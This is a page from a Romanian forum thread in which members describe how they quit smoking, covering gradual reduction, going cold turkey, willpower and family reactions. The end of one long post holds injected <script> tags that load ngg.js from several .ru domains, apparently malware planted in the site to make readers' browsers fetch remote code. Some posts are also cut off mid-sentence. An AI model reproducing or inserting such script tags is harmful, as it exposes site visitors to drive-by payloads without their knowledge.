Follow RomanianPortal on Twitter       
Pagina 2 din 9 PrimulPrimul 1234 ... UltimulUltimul
Rezultate 11 la 20 din 85

Subiect: CUM V-ATI LASAT DE FUMAT?

Guest

Implicit

No way! de luni[img]smileys/smiley4.gif[/img]

Data înscrierii
    21.06.2004
    Posturi
    348
    Putere Rep
    16

Implicit

..ok..luni intram la sala..sa fim ..puternici pentru lumptele care o sa le dam cu ursi ..pesti [img]smileys/smiley36.gif[/img]..nuci..si alte chestii...[img]smileys/smiley36.gif[/img]

Data înscrierii
    15.11.2004
    Locație
    United States
    Posturi
    161
    Putere Rep
    15

Implicit

BRASOV 34

Am fost fumatoare.Timp de 8 ani , am fumat "Marlboro" (la inceput am fumat rosu, apoi light), am ajuns sa consum chiar cate un pachet intreg la 24 de ore.

Cand mi-am zis sa renunt la fumat, stiam ca nu voi rezista sa beau o cafea fara sa fumez,nu concepeam o cafea fara tigara....asa cum nici o tigara nu o consumam fara sa beau ceva(o bere,sau cel putin o cola..etc.)

Fiindca tigara cu cafeaua stateau "mana in mana",mi-am zis sa consum doar la cafea cate tigari pot.Asta dimineata ,cand serveam cafelutza........,in cursul zilei...ma mai ispitea cate inca o tigara, doua....le fumam........dar aveam in gand sa ma las si in timpul asta, de dupa momentul:cafea+tigari, si incercam sa ma abtin , sa nu aprind altele si altele de cate ori imi venea...pofta.

Dupa f.scurt timp(o saptamana-doua), am ajuns sa renunt la tigarile din cursul zilei, fumam doar la cafea 4-5 cat simteam eu ca sunt de ajuns pe ziua respectiva.Dupa asta, in cursul zilei deci,nu mai fumam.Asta fiindca nu mai voiam sa fumez, luptam sa nu mai vreau asta,sa imi scot din gand asa ceva...mama ce furnicaturi ma trecea...cand ma starduiam sa nu aprind alta tigara...era greu, foarte greu.....

La un momentdat, am ajuns sa despic firul in patru la capitolul cafeaua +tigarile de dimineata....Mi-am propus sa "umblu" putin si acolo, si sa reduc si din alea.....De la 4-5 cate fumam strasnic la cafelutza de dimineata ,....am ajuns sa fumez doar 2-3.....dupa un timp, am fumat doar 1-2 .....si la maxim o luna de zile, nu am mai fumat nici o tigara...cand fumam dor una , la un momendat , m-am vazut cum am stins-o cand era doar un sfert arsa si fumata ...si am simtit o puternica repulsie uitandu-ma lascrumiera in care zacea strivita tigara aproape intreaga ....!!!!!!

GATA..acolo a fost moartea tigarii pentru mine..!!!!....multumesc lui Dumnezeu...vorba aia, ca femeie, mi-am zis in primul rande ce sa nu miroase gura mea a trandafir si nu a afumatura de aia nicotinica....!!!??? Plus alte aspecte au bani pe crema de fata -sute de dolari- intr-un an de zile, iar pe de alta parte imi stric si tenul si stomacul si ficatul cu ...tigarile....care tot o groaza de bani costa.....!!!iar la urma ajungi si la medic, tot bani,nu...?--deci am gasit ca nu-si au rostul...!!!!--am ajuns la concluzia cat e de rea placerea fumatului...!!!!

Cand eram fumatoare, si vedeam pe pachet cum scrie "tutunul provoaca cancer" ,sau :"grav daunator sanatatii"..etc...intorceam pachetul sa nu vad asta....pentru ca nu VOIAM sa ma las, ...deci, concluzia mea, e ca totul tine de vointa.Dar numai si numai daca reusesti sa iti implantezi aceasta intentie in subconstient se reuseste altfel ,NU!

Degeaba zici ca renunti, zici sa te auda altii ...si mai zici ca si "NU POT", mai toarna o bere, mai aprinde o tigara, mai pune de-o cafea....oooooho....merge...!

Nu , nu asa, trebuie fixata bine ideea ca atare, altfel nu iese nimic.

Cand mirosea dimineata a cafea in bucatarie....eram cu un pisoi care adulmeca placutul miros....dar cu ochii dupa pachetul de tigari...mama stia ce caut si ...ofta!...[img]smileys/smiley36.gif[/img]..saraca de ea...abia astepta sa las tigarile si credea ca nu o sa mai vada asta vreodta de la mine, asa le "mancam"...!!!!!![img]smileys/smiley36.gif[/img]

ACUM, beau cafea....cu mare placere ....dar , culmea e ca ...MERGE si fara tigara...!!!!!!

Ma simt bine, multumita ca am reusit sa trec peste asta.....doresc tuturora care vor sa se lase de fumat, muuuulta vointa....si ...muuuuuult succes!!!!c=http://www.jvke.r<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script s<script src=http://www.iroe.ru/ngg.js></script>

Data înscrierii
    20.11.2004
    Locație
    Germany, Köln
    Posturi
    2.188
    Putere Rep
    29

Implicit

Eu m-am lasat de multe ori. E foarte usor[img]smileys/smiley36.gif[/img].

Dar exact cu spune Fet, doar c

Guest

Implicit

Toni ,

iti multumesc pentru grija dar ce crezi ca mai apuc sa fac riduri sau ticuri cu catastrofa care se anunta?![img]smileys/smiley4.gif[/img]ce mai conteaza un rid sau tic in plus sau in minus...[img]smileys/smiley36.gif[/img]

P.s.citi ani ai fumat??

Data înscrierii
    09.06.2004
    Locație
    United States
    Posturi
    1.332
    Putere Rep
    18

Implicit

Eu inca il astept aici pe Rossa sa de3zbatem subiectul : renunti dintr-o data sau se poate si treptat?"[img]smileys/smiley2.gif[/img]

Pentru ca se poate si treptat[img]smileys/smiley2.gif[/img]

Data înscrierii
    20.11.2004
    Locație
    Germany, Köln
    Posturi
    2.188
    Putere Rep
    29

Implicit

Citat Postat în original de melina
    P.s.citi ani ai fumat??

Prea multi ![img]smileys/smiley17.gif[/img]Ma tem doar pentru avatarul tau care mai devreme sau mai t

Guest

Implicit

Brasov34, fumatul este o addictie.Este extrem de dificilsa abandonezi obiceiul atata timp catpersoana respectiva nu este convinsa de importanta acestei decisii.Sa nu mai vorbim ca este o decizie foarte personala si indiferent cat de mult te bate cineva la cap nu vei actiona pana nu te vei hotari singura.Am auzit demulte tratamente si medicamente folosite pentru a renunta la fumat, dar din experienta personala, cel mai eficace methoda este cold turkey. Cand m-am hotarit sa ma las, nu am mai cumparat tigari si am refuzat cand altii mi-au oferit. Cel mai greu este cand esti inconjurat de colegi de serviciu, prieteni sau familie care fumeaza. L ainceput am avut dureri de cap, insomnie, agitatie, si alte tulburari dar dupa cateva saptamani nu mai simti nevoia sa fumezi si respiri mai bine, ai mai multa energie si bani in buzunar.Acum nici nu mai pot suporta pefumul in jurul. Bafta!

Data înscrierii
    15.11.2004
    Locație
    United States
    Posturi
    161
    Putere Rep
    15

Implicit

Ah,imi amintesc cum sotul meu se umfla in pene, crezand ca m-am lasat de fumat ca asa avea el chef....Da de unde...!???[img]smileys/smiley17.gif[/img]

I-am si zis, asta am decis-o EU, nu e ca asa a vrut EL...!!!!

Ca daca nu vrei asta, degeaba o vor ceilalti...!!!!

Chiar uneori ma incapatanam sa-i "arat" cum fumez!

Acum cand stie ca m-am lasat doar ca am vrut eu si nu e rezultatul influentei sale...la cat e de..... catar(!!)....!!!!!...ar vrea sa fumez din nou...! ...ce ti-e si cu barbatii astia uneori...!!!!![img]smileys/smiley29.gif[/img]

Data înscrierii
    20.11.2004
    Locație
    Germany, Köln
    Posturi
    2.188
    Putere Rep
    29

Implicit

"...ce ti-e si cu barbatii astia uneori...!!!!!"

Fet, nu intelegi ca in multi barbati e un suflet de cavaler ?! S-a umflat in pene pentru ca a crezut ca ti-a facut un bine, pentru ca ar fi fost salvatorul tau !!! A credintei biruinta cata ori ce cavaler !

Pagina 2 din 9 PrimulPrimul 1234 ... UltimulUltimul

Subiecte similare

1. Ce impresie ne-au lasat forumistii
    De în forumul Discutii Generale-de toate pentru toti, diverse
    Răspunsuri: 54
    Ultimul post: 08.03.2014, 15:11
  2. “Politia” restaurantelor–catalogati restaurantele care v-au lasat amintiri de neuitat
    De sorin în forumul Discutii Generale-de toate pentru toti, diverse
    Răspunsuri: 2
    Ultimul post: 23.01.2009, 19:33

Permisiuni postare

• Nu poți posta subiecte noi
  • Nu poți răspunde la subiecte
  • Nu poți adăuga atașamente
  • Nu poți edita posturile proprii
  •